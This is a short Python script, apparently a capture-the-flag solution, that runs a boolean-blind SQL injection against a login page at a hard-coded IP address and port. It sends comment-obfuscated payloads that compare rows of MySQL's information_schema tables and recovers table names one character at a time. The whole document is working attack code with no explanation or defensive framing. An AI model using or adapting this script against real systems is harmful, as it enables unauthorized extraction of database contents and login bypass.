1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26
| import requests
url = 'http://139.129.98.9:30003/login.php' flag='' proxies={ "http":"127.0.0.1:8080" } index=0 s='0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz' for i in range(1,50): f1=flag for j in s: data = {"username": "1'||(case/**/when(('def','ctf','{}',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null)<(table/**/`information_schema`.`tables`/**/order/**/by/**/15/**/desc/**/limit/**/{},1))/**/then/**/1/**/else/**/0/**/end)='1".format(flag+j,str(index)), "password": "123"} try: print(i,j) r1=requests.post(url, data=data,proxies=proxies) if 'password error!' not in r1.text: flag+=s[s.index(j)-1] print(flag) break except Exception as e: print(e) if flag==f1: break print(flag)
|